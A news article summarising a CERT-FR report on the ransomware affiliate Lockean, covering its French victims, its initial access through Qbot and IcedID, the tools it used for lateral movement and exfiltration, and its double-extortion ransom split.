A study from France’s Computer Emergency Response Team (CERT) has revealed details about the tools and techniques employed by a ransomware affiliate organization known as Lockean.
The threat actor has infiltrated the networks of at least eight French firms over the last year and a half, collecting data and installing malware from numerous ransomware-as-a-service (RaaS) operations.
Lockean’s operation was first spotted in 2020 when the actor targeted a manufacturing organization in France and installed the DoppelPaymer ransomware on their network.
Lockean used multiple ransomware families to target at least seven more firms between June 2020 and March 2021: Maze, ProLock, Egregor, and REvil.
Transport firm Gefco, newspaper Ouest-France, and pharmaceutical companies Fareva and Pierre Fabre are among the enterprises that have been hacked.
According to notifications to ANSSI, France’s national cybersecurity agency, and two cases detailed by private groups Intrinsec and The DFIR Report, four other enterprises, undisclosed by CERT-FR, were victims of Lockean.
In most attacks outlined in the report, the malicious actor initially accessed the victim’s network via Qbot/QakBot, a banking trojan that morphed into a malware distributor, spreading ransomware variants such as ProLock, Egregor, and DoppelPaymer.
Qbot was distributed by emails from the now-defunct Emotet botnet and a lesser-known malware distribution service known as TA551, also known as Shathak, Gold Cabin, and UNC2420.
Lockean exploited the IcedID malware distribution service to gain access to the network in at least one confirmed case. The threat actor employed the Cobalt Strike penetration testing framework and the freely accessible Adfind, BloodHound, and BITSadmin tools for lateral movement.
According to the research, Lockean received 70% of the ransoms, with the remaining 30% going to the RaaS maintainers. The actor used a double-extortion scheme to maximize profit, stealing data from the victim (using the Rclone tool) before encrypting the devices.
Victims were more willing to pay a negotiated ransom if they were threatened with a data breach, which had more severe privacy and legal ramifications.
Valery Marchive of LegMagIT detected multiple IP addresses associated with Conti ransomware in the report’s signs of compromise, indicating Lockean’s involvement with more RaaS operations and targeting organizations in other locations.